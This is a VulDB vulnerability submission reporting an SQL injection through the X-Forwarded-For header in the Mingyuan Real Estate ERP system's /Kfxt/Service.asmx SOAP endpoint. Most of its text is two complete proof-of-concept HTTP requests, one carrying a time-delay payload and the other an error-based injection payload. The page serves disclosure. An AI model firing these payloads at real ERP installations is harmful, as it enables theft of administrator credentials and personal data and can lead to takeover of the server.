Submit #513708: Shenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerabilityinfo

TitelShenzhen Mingyuan Cloud Technology Co., Ltd. Mingyuan Real Estate ERP System v1.0 X-Forwarded-For Injection Vulnerability
BeschreibungWhen the Mingyuan Real Estate ERP system WebService service verifies client IP permissions, it does not strictly filter and obtain the X-Forwarded-For real IP, resulting in a SQL injection vulnerability. Once an authenticated malicious attacker uses the SQL injection vulnerability to obtain information in the database (such as administrator background password, site user personal information), the attacker can even read commands to the server with high permissions to further obtain server system permissions. poc1: POST /Kfxt/Service.asmx HTTP/1.1 Host: User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Content-Type: text/xml; charset=utf-8 X-Forwarded-For: 127.0.0.1');WAITFOR DELAY '0:0:5'-- SOAPAction: http://www.mysoft.com.cn/queryProjects Content-Length: 408 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <queryProjects xmlns="http://www.mysoft.com.cn/"> <inpXML>&lt;xml&gt;&lt;buname&gt;abc&lt;/buname&gt;&lt;/xml&gt;</inpXML> </queryProjects> </soap:Body> </soap:Envelope> poc2: POST /Kfxt/Service.asmx HTTP/1.1 Host: User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Content-Type: text/xml; charset=utf-8 X-Forwarded-For: 127.0.0.1') AND 6994 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6994=6994) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113))) AND ('MEuY'='MEuY SOAPAction: http://www.mysoft.com.cn/queryProjects Content-Length: 408 <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <queryProjects xmlns="http://www.mysoft.com.cn/"> <inpXML>&lt;xml&gt;&lt;buname&gt;abc&lt;/buname&gt;&lt;/xml&gt;</inpXML> </queryProjects> </soap:Body> </soap:Envelope>
Quelle⚠️ https://flowus.cn/share/fa5b99da-2e88-4efd-9266-ae8582782eaa?code=HC3R4E 【FlowUs 息流】Mingyuan Real Estate ERP System V1.0 X-Forwarded-For Injection Vulnerability
Benutzer
 afish (UID 82290)
Einreichung04.03.2025 03:46 (vor 1 Jahr)
Moderieren15.03.2025 23:09 (12 days later)
StatusAkzeptiert
VulDB Eintrag299825 [Shenzhen Mingyuan Cloud Technology Mingyuan Real Estate ERP System 1.0 HTTP Header /Kfxt/Service.asmx X-Forwarded-For SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Do you want to use VulDB in your project?

Use the official API to access entries easily!